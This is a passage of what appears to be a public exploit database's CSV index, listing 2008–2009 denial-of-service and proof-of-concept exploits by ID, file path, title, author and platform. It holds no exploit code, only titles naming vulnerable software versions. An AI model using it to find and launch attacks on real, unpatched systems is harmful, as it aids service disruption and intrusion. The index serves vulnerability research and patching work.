Multiple Remote Buffer Overflow Vulnerabilities",2008-12-01,"BLUE MOON",windows,dos, -7330,exploits/multiple/dos/7330.c,"ClamAV < 0.94.2 - JPEG Parsing Recursive Stack Overflow (PoC)",2008-12-03,"ilja van sprundel",multiple,dos, -7358,exploits/windows/dos/7358.html,"Visagesoft eXPert PDF EditorX - 'VSPDFEditorX.ocx' Insecure Method",2008-12-05,"Marco Torti",windows,dos, -7362,exploits/windows/dos/7362.py,"DesignWorks Professional 4.3.1 - '.CCT' File Local Stack Buffer Overflow (PoC)",2008-12-06,Cnaph,windows,dos, -7387,exploits/windows/dos/7387.py,"Neostrada Livebox Router - Remote Network Down (PoC)",2008-12-08,0in,windows,dos, -7401,exploits/windows/dos/7401.txt,"Vinagre < 2.24.2 - 'show_error()' Remote Format String (PoC)",2008-12-09,"Core Security",windows,dos, -7405,exploits/linux/dos/7405.c,"Linux Kernel 2.6.27.8 - ATMSVC Local Denial of Service",2008-12-10,"Jon Oberheide",linux,dos, -7431,exploits/windows/dos/7431.pl,"Microsoft Visual Basic - ActiveX Controls mscomct2.ocx Buffer Overflow (PoC)",2008-12-12,"Jerome Athias",windows,dos, -7454,exploits/linux/dos/7454.c,"Linux Kernel 2.6.27.7-generic/2.6.18/2.6.24-1 - Local Denial of Service",2008-12-14,Adurit-T,linux,dos, -7460,exploits/windows/dos/7460.html,"EvansFTP - 'EvansFTP.ocx' Remote Buffer Overflow (PoC)",2008-12-14,Bl@ckbe@rD,windows,dos, -7467,exploits/multiple/dos/7467.txt,"Amaya Web Browser 10.0.1/10.1-pre5 - HTML Tag Buffer Overflow (PoC)",2008-12-15,webDEViL,multiple,dos, -7520,exploits/multiple/dos/7520.c,"Avahi < 0.6.24 - mDNS Daemon Remote Denial of Service",2008-12-19,"Jon Oberheide",multiple,dos, -7535,exploits/hardware/dos/7535.php,"Linksys WAG54G v2 Wireless ADSL Router - HTTPd Denial of Service",2008-12-21,r0ut3r,hardware,dos, -7554,exploits/windows/dos/7554.pl,"Mozilla Firefox 3.0.5 - location.hash Remote Crash",2008-12-23,"Jeremy Brown",windows,dos, -7555,exploits/multiple/dos/7555.py,"Psi Jabber Client (Windows / Linux) - Remote Denial of Service",2008-12-23,Sha0,multiple,dos, -7556,exploits/windows/dos/7556.php,"PGP Desktop 9.0.6 - 'PGPwded.sys' Local Denial of Service",2008-12-23,Evilcry,windows,dos, -7564,exploits/multiple/dos/7564.pl,"Getleft 1.2 - Remote Buffer Overflow (PoC)",2008-12-23,Koshi,multiple,dos, -7571,exploits/windows/dos/7571.txt,"BulletProof FTP Client 2.63 - Local Heap Overflow (PoC)",2008-12-24,His0k4,windows,dos, -7578,exploits/windows/dos/7578.pl,"SAWStudio 3.9i - '.prf' Local Buffer Overflow (PoC)",2008-12-24,Encrypt3d.M!nd,windows,dos, -7585,exploits/windows/dos/7585.txt,"Microsoft Windows Media Player - '.wav' Remote Crash (PoC)",2008-12-28,"laurent gaffié",windows,dos, -7589,exploits/windows/dos/7589.pl,"BulletProof FTP Client - '.bps' Local Stack Overflow (PoC)",2008-12-28,Stack,windows,dos, -7592,exploits/windows/dos/7592.pl,"Hex Workshop 5.1.4 - Color Mapping File Local Buffer Overflow (PoC)",2008-12-28,Encrypt3d.M!nd,windows,dos, -7632,exploits/hardware/dos/7632.txt,"Nokia S60 SMS/MMS (Curse of Silence) - Denial of Service",2009-01-01,"Tobias Engel",hardware,dos, -7634,exploits/windows/dos/7634.pl,"Audacity 1.2.6 - '.gro' Local Buffer Overflow (PoC)",2009-01-01,Houssamix,windows,dos, -7637,exploits/windows/dos/7637.pl,"Elecard MPEG Player 5.5 - '.m3u' Stack Buffer Overflow (PoC)",2009-01-01,"aBo MoHaMeD",windows,dos, -7643,exploits/multiple/dos/7643.txt,"Konqueror 4.1 - Cross-Site Scripting / Remote Crash",2009-01-01,StAkeR,multiple,dos, -7647,exploits/multiple/dos/7647.txt,"VMware 2.5.1 - 'VMware-authd' Remote Denial of Service",2009-01-02,"laurent gaffié",multiple,dos, -7649,exploits/windows/dos/7649.pl,"Destiny Media Player 1.61 - '.m3u' Local Buffer Overflow (PoC)",2009-01-02,"aBo MoHaMeD",windows,dos, -7652,exploits/windows/dos/7652.pl,"Destiny Media Player 1.61 - '.lst' Local Buffer Overflow (PoC)",2009-01-03,Encrypt3d.M!nd,windows,dos, -7673,exploits/multiple/dos/7673.html,"Apple Safari - 'ARGUMENTS' Array Integer Overflow HeapSpray (PoC)",2009-01-05,Skylined,multiple,dos, -7685,exploits/multiple/dos/7685.pl,"SeaMonkey 1.1.14 - Denial of Service",2009-01-06,StAkeR,multiple,dos, -7693,exploits/windows/dos/7693.pl,"Perception LiteServe 2.0.1 - 'user' Remote Buffer Overflow (PoC)",2009-01-07,Houssamix,windows,dos, -7694,exploits/windows/dos/7694.py,"Audacity 1.6.2 - '.aup' Remote Off-by-One Crash",2009-01-07,Stack,windows,dos, -7696,exploits/windows/dos/7696.pl,"Winamp GEN_MSN Plugin - Heap Buffer Overflow (PoC)",2009-01-07,SkD,windows,dos, -7708,exploits/windows/dos/7708.pl,"MP3 TrackMaker 1.5 - '.mp3' Local Heap Overflow (PoC)",2009-01-09,Houssamix,windows,dos, -7709,exploits/windows/dos/7709.pl,"VUPlayer 2.49 - '.asx' HREF Local Buffer Overflow (PoC)",2009-01-09,"aBo MoHaMeD",windows,dos, -7710,exploits/windows/dos/7710.html,"Microsoft Internet Explorer - JavaScript screen[ ] Denial of Service",2009-01-09,Skylined,windows,dos, -7720,exploits/windows/dos/7720.pl,"Microsoft Windows - '.chm' Denial of Service (HTML Compiled)",2009-01-11,securfrog,windows,dos, -7721,exploits/windows/dos/7721.pl,"Browse3D 3.5 - '.sfs' Local Buffer Overflow (PoC)",2009-01-11,Houssamix,windows,dos, -7737,exploits/windows/dos/7737.py,"Triologic Media Player 7 - '.m3u' Local Heap Buffer Overflow (PoC)",2009-01-12,zAx,windows,dos, -7742,exploits/windows/dos/7742.txt,"Winamp 5.541 - '.mp3'/'.aiff' File Multiple Denial of Service Vulnerabilities",2009-01-12,securfrog,windows,dos, -7750,exploits/windows/dos/7750.html,"PowerPoint Viewer OCX 3.1 - Remote File Overwrite",2009-01-13,Stack,windows,dos, -7751,exploits/windows/dos/7751.pl,"dBpowerAMP Audio Player 2 - '.pls' Local Buffer Overflow (PoC)",2009-01-13,Stack,windows,dos, -7756,exploits/windows/dos/7756.py,"Nofeel FTP Server 3.6 - 'CWD' Remote Memory Consumption",2009-01-13,His0k4,windows,dos, -7776,exploits/hardware/dos/7776.c,"Cisco - VLAN Trunking Protocol Denial of Service",2009-01-14,showrun,hardware,dos, -7785,exploits/multiple/dos/7785.py,"Oracle TimesTen - Remote Format String (PoC)",2009-01-14,"Joxean Koret",multiple,dos, -7790,exploits/windows/dos/7790.txt,"netsurf Web browser 1.2 - Multiple Vulnerabilities",2009-01-14,"Jeremy Brown",windows,dos, -7799,exploits/windows/dos/7799.pl,"Novell Netware 6.5 - 'ICEbrowser' Remote System Denial of Service",2009-01-16,"Jeremy Brown",windows,dos, -7812,exploits/multiple/dos/7812.pl,"MPlayer 1.0rc2 - TwinVQ Stack Buffer Overflow (PoC)",2009-01-16,sCORPINo,multiple,dos, -7822,exploits/multiple/dos/7822.c,"D-Bus Daemon < 1.2.4 - 'libdbus' Denial of Service",2009-01-19,"Jon Oberheide",multiple,dos, -7823,exploits/qnx/dos/7823.txt,"QNX 6.4.0 - bitflipped ELF Binary 'id' Kernel Panic (Denial of Service)",2009-01-19,kokanin,qnx,dos, -7852,exploits/windows/dos/7852.pl,"FTPShell Server 4.3 - Licence Key Remote Buffer Overflow (PoC)",2009-01-22,LiquidWorm,windows,dos, -7854,exploits/windows/dos/7854.pl,"MediaMonkey 3.0.6 - '.m3u' Local Buffer Overflow (PoC)",2009-01-25,AlpHaNiX,windows,dos, -7857,exploits/windows/dos/7857.pl,"Merak Media Player 3.2 - '.m3u' File Local Buffer Overflow (PoC)",2009-01-25,Houssamix,windows,dos, -7865,exploits/solaris/dos/7865.c,"SunOS Release 5.11 snv_101b - Remote IPv6 Crash",2009-01-26,kingcope,solaris,dos, -7869,exploits/windows/dos/7869.html,"MW6 Barcode - ActiveX 'Barcode.dll' Remote Heap Overflow (PoC)",2009-01-26,Houssamix,windows,dos, -7882,exploits/windows/dos/7882.html,"NCTVideoStudio ActiveX DLLs 1.6 - Remote Heap Overflow (PoC)",2009-01-26,Stack,windows,dos, -7887,exploits/windows/dos/7887.pl,"Zinf Audio Player 2.2.1 - '.pls' Stack Overflow (PoC)",2009-01-27,Hakxer,windows,dos, -7889,exploits/windows/dos/7889.pl,"Zinf Audio Player 2.2.1 - '.m3u' Local Heap Overflow (PoC)",2009-01-27,Hakxer,windows,dos, -7890,exploits/windows/dos/7890.pl,"Zinf Audio Player 2.2.1 - '.gqmpeg' Buffer Overflow (PoC)",2009-01-27,Hakxer,windows,dos, -7902,exploits/windows/dos/7902.txt,"Amaya Web Editor 11.0 - XML / HTML Parser",2009-01-28,"Core Security",windows,dos, -7904,exploits/windows/dos/7904.pl,"Thomson mp3PRO Player/Encoder - '.m3u' Crash (PoC)",2009-01-29,Hakxer,windows,dos, -7906,exploits/windows/dos/7906.pl,"Amaya Web Editor 11.0 - Remote Buffer Overflow (PoC)",2009-01-29,Stack,windows,dos, -7934,exploits/windows/dos/7934.py,"Spider Player 2.3.9.5 - '.asx' Off-by-One Crash",2009-01-30,Houssamix,windows,dos, -7942,exploits/windows/dos/7942.pl,"Elecard AVC HD player - '.m3u' / '.xpl' Local Stack Overflow (PoC)",2009-02-02,AlpHaNiX,windows,dos, -7943,exploits/windows/dos/7943.py,"RealVNC 4.1.2 - 'vncviewer.exe' RFB Protocol Remote Code Execution (PoC)",2009-02-02,"Andres Luksenberg",windows,dos, -7962,exploits/windows/dos/7962.pl,"Hex Workshop 6.0 - '.cmap' Invalid Memory Reference (PoC)",2009-02-03,DATA_SNIPER,windows,dos, -7985,exploits/windows/dos/7985.pl,"Novell Groupwise 8.0 - Malformed RCPT Command Off-by-One",2009-02-04,"Praveen Darshanam",windows,dos, -7986,exploits/windows/dos/7986.pl,"Free Download Manager 2.5/3.0 - Authorisation Stack Buffer Overflow (PoC)",2009-02-04,"Praveen Darshanam",windows,dos, -7990,exploits/windows/dos/7990.py,"UltraVNC/TightVNC (Multiple VNC Clients) - Multiple Integer Overflows (PoC)",2009-02-04,"Andres Luksenberg",windows,dos, -7995,exploits/windows/dos/7995.pl,"FeedMon 2.7.0.0 - outline Tag Buffer Overflow (PoC)",2009-02-05,"Praveen Darshanam",windows,dos, -8008,exploits/hardware/dos/8008.txt,"NETGEAR SSL312 Router - Denial of Service",2009-02-09,Rembrandt,hardware,dos, -8013,exploits/hardware/dos/8013.txt,"Nokia N95-8 - '.jpg' Remote Crash (PoC)",2009-02-09,"Juan Yacubian",hardware,dos, -8021,exploits/multiple/dos/8021.pl,"Squid < 3.1 5 - HTTP Version Number Parsing Denial of Service",2009-02-09,"Praveen Darshanam",multiple,dos, -8024,exploits/windows/dos/8024.py,"TightVNC - Authentication Failure Integer Overflow (PoC)",2009-02-09,desi,windows,dos, -8051,exploits/hardware/dos/8051.html,"Nokia N95-8 browser - 'setAttributeNode' Method Crash",2009-02-13,"Juan Yacubian",hardware,dos, -8058,exploits/windows/dos/8058.pl,"TPTEST 3.1.7 - Stack Buffer Overflow (PoC)",2009-02-16,ffwd,windows,dos, -8077,exploits/windows/dos/8077.html,"Microsoft Internet Explorer 7 - Memory Corruption (PoC) (MS09-002)",2009-02-18,anonymous,windows,dos, -8084,exploits/windows/dos/8084.pl,"Got All Media 7.0.0.3 - Remote Denial of Service",2009-02-20,LiquidWorm,windows,dos, -8090,exploits/windows/dos/8090.txt,"Multiple PDF Readers - JBIG2 Local Buffer Overflow (PoC)",2009-02-23,webDEViL,windows,dos, -8091,exploits/multiple/dos/8091.html,"Mozilla Firefox 3.0.6 - BODY onload Remote Crash",2009-02-23,Skylined,multiple,dos, -8099,exploits/windows/dos/8099.pl,"Adobe Acrobat Reader - JBIG2 Local Buffer Overflow (PoC) (2)",2009-02-23,"Guido Landi",windows,dos, -8102,exploits/windows/dos/8102.txt,"Counter Strike Source ManiAdminPlugin 1.x - Remote Buffer Overflow (PoC)",2009-02-24,M4rt1n,windows,dos, -8106,exploits/hardware/dos/8106.txt,"NETGEAR WGR614v9 Wireless Router - Denial of Service",2009-02-25,staticrez,hardware,dos, -8125,exploits/hardware/dos/8125.rb,"HTC Touch - vCard over IP Denial of Service",2009-03-02,"Mobile Security Lab",hardware,dos, -8129,exploits/windows/dos/8129.pl,"Novell eDirectory iMonitor - 'Accept-Language' Request Buffer Overflow (PoC)",2009-03-02,"Praveen Darshanam",windows,dos, -8135,exploits/windows/dos/8135.pl,"Media Commands - '.m3u' / '.m3l' / '.TXT' / '.LRC' Local Heap Overflow (PoC)",2009-03-02,Hakxer,windows,dos, -8148,exploits/multiple/dos/8148.pl,"Yaws < 1.80 - Multiple Headers Remote Denial of Service Vulnerabilities",2009-03-03,"Praveen Darshanam",multiple,dos, -8156,exploits/windows/dos/8156.txt,"Easy Web Password 1.2 - Local Heap Memory Consumption (PoC)",2009-03-04,Stack,windows,dos, -8163,exploits/bsd/dos/8163.txt,"Libc - 'libc:fts_*()' Local Denial of Service",2009-03-05,SecurityReason,bsd,dos, -8180,exploits/windows/dos/8180.c,"eZip Wizard 3.0 - Local Stack Buffer Overflow (PoC) (SEH)",2009-03-09,"fl0 fl0w",windows,dos, -8187,exploits/hardware/dos/8187.sh,"Addonics NAS Adapter - Authenticated Denial of Service",2009-03-09,h00die,hardware,dos, -8190,exploits/windows/dos/8190.txt,"IBM Director 5.20.3su2 CIM Server - Remote Denial of Service",2009-03-10,"Bernhard Mueller",windows,dos, -8205,exploits/linux/dos/8205.pl,"JDKChat 1.5 - Remote Integer Overflow (PoC)",2009-03-12,n3tpr0b3,linux,dos, -8212,exploits/windows/dos/8212.pl,"RhinoSoft Serv-U FTP Server 7.4.0.1 - 'SMNT' Authenticated Denial of Service",2009-03-16,"Jonathan Salwan",windows,dos, -8213,exploits/windows/dos/8213.pl,"VideoLAN VLC Media Player 0.9.8a - Web UI 'input' Remote Denial of Service",2009-03-16,TheLeader,windows,dos, -8219,exploits/multiple/dos/8219.html,"Mozilla Firefox 3.0.7 - OnbeforeUnLoad DesignMode Dereference Crash",2009-03-16,Skylined,multiple,dos, -8224,exploits/windows/dos/8224.pl,"WinAsm Studio 5.1.5.0 - Local Heap Overflow (PoC)",2009-03-16,Stack,windows,dos, -8225,exploits/windows/dos/8225.py,"Gretech GOM Encoder 1.0.0.11 - '.Subtitle' Buffer Overflow (PoC)",2009-03-16,Encrypt3d.M!nd,windows,dos, -8232,exploits/windows/dos/8232.py,"Chasys Media Player 1.1 - '.pls' Local Buffer Overflow (PoC) (SEH)",2009-03-18,zAx,windows,dos, -8241,exploits/multiple/dos/8241.txt,"ModSecurity < 2.5.9 - Remote Denial of Service",2009-03-19,"Juan Galiana Lara",multiple,dos, -8245,exploits/multiple/dos/8245.c,"SW-HTTPD Server 0.x - Remote Denial of Service",2009-03-19,"Jonathan Salwan",multiple,dos, -8259,exploits/freebsd/dos/8259.c,"FreeBSD 7.x - Dumping Environment Local Kernel Panic (Denial of Service)",2009-03-23,kokanin,freebsd,dos, -8260,exploits/hardware/dos/8260.txt,"Gigaset SE461 WiMAX Router - Remote Denial of Service",2009-03-23,Benkei,hardware,dos, -8262,exploits/osx/dos/8262.c,"Apple Mac OSX xnu 1228.3.13 - 'zip-notify' Remote Kernel Overflow (PoC)",2009-03-23,mu-b,osx,dos, -8263,exploits/osx/dos/8263.c,"Apple Mac OSX xnu 1228.3.13 - 'macfsstat' Local Kernel Memory Leak/Denial of Service",2009-03-23,mu-b,osx,dos, -8264,exploits/osx/dos/8264.c,"Apple Mac OSX xnu 1228.3.13 - 'Profil' Kernel Memory Leak/Denial of Service (PoC)",2009-03-23,mu-b,osx,dos, -8265,exploits/osx/dos/8265.c,"Apple Mac OSX xnu 1228.x - 'vfssysctl' Local Kernel Denial of Service (PoC)",2009-03-23,mu-b,osx,dos, -8281,exploits/windows/dos/8281.txt,"Microsoft GdiPlus - EMF GpFont.SetData Integer Overflow (PoC)",2009-03-24,"Black Security",windows,dos, -8285,exploits/multiple/dos/8285.txt,"Mozilla Firefox XSL - Parsing Remote Memory Corruption (PoC) (1)",2009-03-25,"Guido Landi",multiple,dos, -8294,exploits/windows/dos/8294.c,"XM Easy Personal FTP Server 5.7.0 - 'NLST' Denial of Service",2009-03-27,"Jonathan Salwan",windows,dos, -8300,exploits/windows/dos/8300.py,"PowerCHM 5.7 - '.hhp' Stack Overflow (PoC)",2009-03-27,Encrypt3d.M!nd,windows,dos, -8306,exploits/windows/dos/8306.txt,"Mozilla Firefox 3.0.x - XML Parser Memory Corruption / Denial of Service (PoC)",2009-03-30,"Wojciech Pawlikowski",windows,dos, -8308,exploits/multiple/dos/8308.c,"Wireshark 1.0.6 - PN-DCP Format String (PoC)",2009-03-30,"THCX Labs",multiple,dos, -8310,exploits/windows/dos/8310.pl,"Sami HTTP Server 2.x - 'HEAD' Remote Denial of Service",2009-03-30,"Jonathan Salwan",windows,dos, -8313,exploits/hardware/dos/8313.txt,"Check Point Firewall-1 - PKI Web Service HTTP Header Remote Overflow",2009-03-30,"Bugs NotHugs",hardware,dos, -8314,exploits/windows/dos/8314.php,"Amaya 11.1 - W3C Editor/Browser (defer) Stack Overflow (PoC)",2009-03-30,"Alfons Luja",windows,dos, -8320,exploits/multiple/dos/8320.py,"Opera 9.64 - 7400 nested elements XML Parsing Remote Crash",2009-03-30,"Ahmed Obied",multiple,dos, -8325,exploits/windows/dos/8325.py,"Apple Safari 3.2.2/4b - nested elements XML Parsing Remote Crash",2009-03-31,"Ahmed Obied",windows,dos, -8333,exploits/multiple/dos/8333.txt,"Sun Calendar Express Web Server - Denial of Service / Cross-Site Scripting",2009-03-31,"Core Security",multiple,dos, -8335,exploits/windows/dos/8335.c,"DeepBurner 1.9.0.228 - Stack Buffer Overflow (SEH) (PoC)",2009-04-01,"fl0 fl0w",windows,dos, -8337,exploits/multiple/dos/8337.c,"XBMC 8.10 - GET Multiple Remote Buffer Overflows (PoC)",2009-04-01,n00b,multiple,dos, -8344,exploits/multiple/dos/8344.py,"IBM DB2 < 9.5 pack 3a - Connect Denial of Service",2009-04-03,"Dennis Yurichev",multiple,dos, -8345,exploits/multiple/dos/8345.py,"IBM DB2 < 9.5 pack 3a - Data Stream Denial of Service",2009-04-03,"Dennis Yurichev",multiple,dos, -8352,exploits/windows/dos/8352.txt,"Amaya 11.1 - XHTML Parser Remote Buffer Overflow (PoC)",2009-04-06,cicatriz,windows,dos, -8356,exploits/windows/dos/8356.txt,"Mozilla Firefox XSL - Parsing Remote Memory Corruption (PoC) (2)",2009-04-06,DATA_SNIPER,windows,dos, -8358,exploits/windows/dos/8358.pl,"UltraISO 9.3.3.2685 - '.ui' Off-by-One / Buffer Overflow (PoC)",2009-04-06,Stack,windows,dos, -8360,exploits/windows/dos/8360.pl,"Unsniff Network Analyzer 1.0 - 'usnf' Local Heap Overflow (PoC)",2009-04-06,LiquidWorm,windows,dos, -8370,exploits/windows/dos/8370.pl,"GOM Player 2.1.16.6134 - Subtitle Local Buffer Overflow (PoC)",2009-04-08,"Bui Quang Minh",windows,dos, -8378,exploits/windows/dos/8378.pl,"SWF Opener 1.3 - '.swf' Off-by-One Buffer Overflow (PoC)",2009-04-09,Stack,windows,dos, -8390,exploits/windows/dos/8390.cpp,"Xilisoft Video Converter Wizard 3 - '.cue' Stack Buffer Overflow (PoC)",2009-04-10,"fl0 fl0w",windows,dos, -8391,exploits/windows/dos/8391.txt,"Chance-i DiViS-Web DVR System - ActiveX Control Heap Overflow (PoC)",2009-04-10,DSecRG,windows,dos, -8393,exploits/hardware/dos/8393.txt,"Cisco ASA/PIX - Appliances Fail to Properly Check Fragmented TCP Packets",2009-04-10,"Daniel Clemens",hardware,dos, -8402,exploits/windows/dos/8402.pl,"Mini-stream Ripper - '.m3u' Local Stack Overflow (PoC)",2009-04-13,Cyber-Zone,windows,dos, -8403,exploits/windows/dos/8403.pl,"WM Downloader - '.m3u' Local Stack Overflow (PoC)",2009-04-13,Cyber-Zone,windows,dos, -8404,exploits/windows/dos/8404.pl,"RM Downloader - '.m3u' Local Stack Overflow (PoC)",2009-04-13,Cyber-Zone,windows,dos, -8405,exploits/windows/dos/8405.pl,"Mini-stream RM-MP3 Converter - '.m3u' Local Stack Overflow (PoC)",2009-04-13,Cyber-Zone,windows,dos, -8406,exploits/openbsd/dos/8406.txt,"OpenBSD 4.5 - IP datagrams Remote Denial of Service",2009-04-13,Rembrandt,openbsd,dos, -8407,exploits/windows/dos/8407.pl,"ASX to MP3 Converter - '.m3u' Local Stack Overflow (PoC)",2009-04-13,Cyber-Zone,windows,dos, -8429,exploits/multiple/dos/8429.pl,"Steamcast 0.9.75b - Remote Denial of Service",2009-04-14,ksa04,multiple,dos, -8430,exploits/openbsd/dos/8430.py,"OpenBSD 4.5 - IP datagram Null Pointer Deref Denial of Service",2009-04-14,nonroot,openbsd,dos, -8434,exploits/windows/dos/8434.html,"PowerCHM 5.7 - Long URL Local Stack Overflow (PoC)",2009-04-14,SuB-ZeRo,windows,dos, -8445,exploits/windows/dos/8445.pl,"Microsoft Windows Media Player - '.mid' Integer Overflow (PoC)",2009-04-15,HuoFu,windows,dos, -8447,exploits/windows/dos/8447.txt,"Zervit Web Server 0.02 - Remote Buffer Overflow (PoC)",2009-04-15,e.wiZz!,windows,dos, -8451,exploits/windows/dos/8451.pl,"Apollo 37zz - '.m3u' Local Heap Overflow (PoC)",2009-04-16,Cyber-Zone,windows,dos, -8452,exploits/windows/dos/8452.c,"Elecard AVC HD Player - '.XPL' Stack Buffer Overflow (SEH) (PoC)",2009-04-16,"fl0 fl0w",windows,dos, -8462,exploits/windows/dos/8462.pl,"MagicISO CCD/Cue - Local Heap Overflow (PoC)",2009-04-16,Stack,windows,dos, -8465,exploits/windows/dos/8465.pl,"Microsoft Media Player - 'quartz.dll .mid' Denial of Service",2009-04-17,"Code Audit Labs",windows,dos, -8466,exploits/windows/dos/8466.pl,"Microsoft GDI Plugin - '.png' Infinite Loop Denial of Service (PoC)",2009-04-17,"Code Audit Labs",windows,dos, -8467,exploits/windows/dos/8467.pl,"Microsoft Media Player - 'quartz.dll .wav' Multiple Remote Denial of Service Vulnerabilities",2009-04-17,"Code Audit Labs",windows,dos, -8469,exploits/linux/dos/8469.c,"XRDP 0.4.1 - Unauthenticated Remote Buffer Overflow (PoC)",2009-04-17,"joe walko",linux,dos, -8479,exploits/windows/dos/8479.html,"Microsoft Internet Explorer - EMBED Memory Corruption (PoC) (MS09-014)",2009-04-20,Skylined,windows,dos, -8484,exploits/windows/dos/8484.pl,"1by1 1.67 - '.m3u' Local Stack Overflow (PoC)",2009-04-20,GoLd_M,windows,dos, -8485,exploits/windows/dos/8485.pl,"Groovy Media Player 1.1.0 - '.m3u' Local Stack Overflow (PoC)",2009-04-20,GoLd_M,windows,dos, -8489,exploits/windows/dos/8489.pl,"CoolPlayer Portable 2.19.1 - '.m3u' Local Stack Overflow (PoC)",2009-04-20,GoLd_M,windows,dos, -8490,exploits/hardware/dos/8490.sh,"Addonics NAS Adapter - 'bts.cgi' Authenticated Remote Denial of Service",2009-04-20,h00die,hardware,dos, -8500,exploits/windows/dos/8500.py,"Zervit Web Server 0.3 - Remote Denial of Service",2009-04-21,shinnai,windows,dos, -8507,exploits/windows/dos/8507.py,"Oracle RDBms 10.2.0.3/11.1.0.6 - TNS Listener (PoC)",2009-04-21,"Dennis Yurichev",windows,dos, -8511,exploits/windows/dos/8511.pl,"Xitami Web Server 5.0 - Remote Denial of Service",2009-04-22,"Jonathan Salwan",windows,dos, -8512,exploits/windows/dos/8512.txt,"Counter Strike Source ManiAdminPlugin 2.0 - Remote Crash",2009-04-22,M4rt1n,windows,dos, -8522,exploits/windows/dos/8522.pl,"Zervit Web Server 0.3 - sockets++ crash Remote Denial of Service",2009-04-22,"Jonathan Salwan",windows,dos, -8523,exploits/windows/dos/8523.txt,"Norton Ghost Support module for EasySetup wizard - Remote Denial of Service (PoC)",2009-04-23,shinnai,windows,dos, -8524,exploits/windows/dos/8524.txt,"Home Web Server r1.7.1 (build 147) - GUI Thread-Memory Corruption",2009-04-23,Aodrulez,windows,dos, -8526,exploits/windows/dos/8526.py,"Popcorn 1.87 - Remote Heap Overflow (PoC)",2009-04-23,x.CJP.x,windows,dos, -8531,exploits/windows/dos/8531.pl,"SDP Downloader 2.3.0 - '.asx' Local Heap Overflow (PoC)",2009-04-24,Cyber-Zone,windows,dos, -8542,exploits/windows/dos/8542.php,"Icewarp Merak Mail Server 9.4.1 - 'Base64FileEncode()' Buffer Overflow (PoC)",2009-04-27,Nine:Situations:Group,windows,dos, -8544,exploits/linux/dos/8544.pl,"iodined 0.4.2-2 - forged DNS packet Denial of Service",2009-04-27,"Albert Sellares",linux,dos, -8568,exploits/windows/dos/8568.pl,"mpegable Player 2.12 - '.yuv' Local Stack Overflow (PoC)",2009-04-29,GoLd_M,windows,dos, -8573,exploits/windows/dos/8573.html,"Google Chrome 1.0.154.53 - Null Pointer Remote Crash",2009-04-30,"Aditya K Sood",windows,dos, -8578,exploits/windows/dos/8578.pl,"Mercury Audio Player 1.21 - '.m3u' Local Stack Overflow (PoC)",2009-04-30,SirGod,windows,dos, -8581,exploits/bsd/dos/8581.txt,"Multiple Vendor - PF Null Pointer Dereference",2009-04-30,Rembrandt,bsd,dos, -8584,exploits/hardware/dos/8584.py,"Addonics NAS Adapter FTP - Remote Denial of Service",2009-05-01,h00die,hardware,dos, -8588,exploits/windows/dos/8588.pl,"Beatport Player 1.0.0.283 - '.m3u' Local Buffer Overflow (PoC)",2009-05-01,SirGod,windows,dos, -8597,exploits/solaris/dos/8597.c,"Solaris 10 / OpenSolaris - 'dtrace' Local Kernel Denial of Service (PoC)",2009-05-04,mu-b,solaris,dos, -8598,exploits/solaris/dos/8598.c,"Solaris 10 / OpenSolaris - 'fasttrap' Local Kernel Denial of Service (PoC)",2009-05-04,mu-b,solaris,dos, -8601,exploits/windows/dos/8601.txt,"EW-MusicPlayer 0.8 - '.m3u' Local Buffer Overflow (PoC)",2009-05-04,SirGod,windows,dos, -8606,exploits/windows/dos/8606.py,"Quick 'n Easy Mail Server 3.3 (Demo) - Remote Denial of Service (PoC)",2009-05-04,shinnai,windows,dos, -8607,exploits/windows/dos/8607.pl,"Bmxplay 0.4.4b - '.bmx' Local Buffer Overflow (PoC)",2009-05-04,SirGod,windows,dos, -8611,exploits/win_x86/dos/8611.pl,"32bit FTP (09.04.24) - 'Banner' Remote Buffer Overflow (PoC)",2009-05-05,"Load 99%",win_x86,dos, -8617,exploits/windows/dos/8617.pl,"Sorinara Streaming Audio Player 0.9 - '.m3u' Local Stack Overflow (PoC)",2009-05-05,Cyber-Zone,windows,dos, -8625,exploits/windows/dos/8625.pl,"Sorinara Streaming Audio Player 0.9 - '.pla' Local Stack Overflow (PoC)",2009-05-07,GoLd_M,windows,dos, -8644,exploits/windows/dos/8644.pl,"ViPlay3 < 3.00 - '.vpl' Local Stack Overflow (PoC)",2009-05-08,LiquidWorm,windows,dos, -8646,exploits/multiple/dos/8646.php,"Mortbay Jetty 7.0.0-pre5 Dispatcher Servlet - Denial of Service",2009-05-08,ikki,multiple,dos, -8650,exploits/windows/dos/8650.c,"TYPSoft FTP Server 1.11 - 'ABORT' Remote Denial of Service",2009-05-11,"Jonathan Salwan",windows,dos, -8665,exploits/windows/dos/8665.html,"Java SE Runtime Environment JRE 6 Update 13 - Multiple Vulnerabilities",2009-05-13,shinnai,windows,dos, -8669,exploits/multiple/dos/8669.c,"IPsec-Tools < 0.7.2 (racoon frag-isakmp) - Multiple Remote Denial of Service Vulnerabilities (PoC)",2009-05-13,mu-b,multiple,dos, -8677,exploits/windows/dos/8677.txt,"DigiMode Maya 1.0.2 - '.m3u' / '.m3l' Buffer Overflow (PoC)",2009-05-14,SirGod,windows,dos, -8695,exploits/multiple/dos/8695.txt,"Eggdrop/Windrop 1.6.19 - ctcpbuf Remote Crash",2009-05-15,"Thomas Sader",multiple,dos, -8712,exploits/windows/dos/8712.txt,"httpdx 0.5b - Multiple Remote Denial of Service Vulnerabilities",2009-05-18,sico2819,windows,dos, -8720,exploits/multiple/dos/8720.c,"OpenSSL 0.9.8k/1.0.0-beta2 - DTLS Remote Memory Exhaustion Denial of Service",2009-05-18,"Jon Oberheide",multiple,dos, -8721,exploits/windows/dos/8721.pl,"Zervit Web Server 0.04 - GET Remote Buffer Overflow (PoC)",2009-05-18,Stack,windows,dos, -8722,exploits/windows/dos/8722.py,"Mereo 1.8.0 - GET Remote Denial of Service",2009-05-18,Stack,windows,dos, -8767,exploits/windows/dos/8767.c,"Winamp 5.551 - MAKI Parsing Integer Overflow (PoC)",2009-05-22,n00b,windows,dos, -8777,exploits/windows/dos/8777.txt,"Soulseek 157 NS x/156.x - Remote Distributed Search Code Execution",2009-05-26,"laurent gaffié",windows,dos, -8794,exploits/multiple/dos/8794.html,"Mozilla Firefox - unclamped loop Denial of Service",2009-05-26,"Thierry Zoller",multiple,dos, -8798,exploits/windows/dos/8798.rb,"Apple Safari - RSS 'feed://' Buffer Overflow via libxml2 (PoC)",2009-05-26,"Kevin Finisterre",windows,dos, -8822,exploits/multiple/dos/8822.txt,"Mozilla Firefox 3.0.10 - 'KEYGEN' Remote Denial of Service",2009-05-29,"Thierry Zoller",multiple,dos, -8826,exploits/multiple/dos/8826.txt,"Adobe Acrobat 9.1.1 (OSX/Windows) - Stack 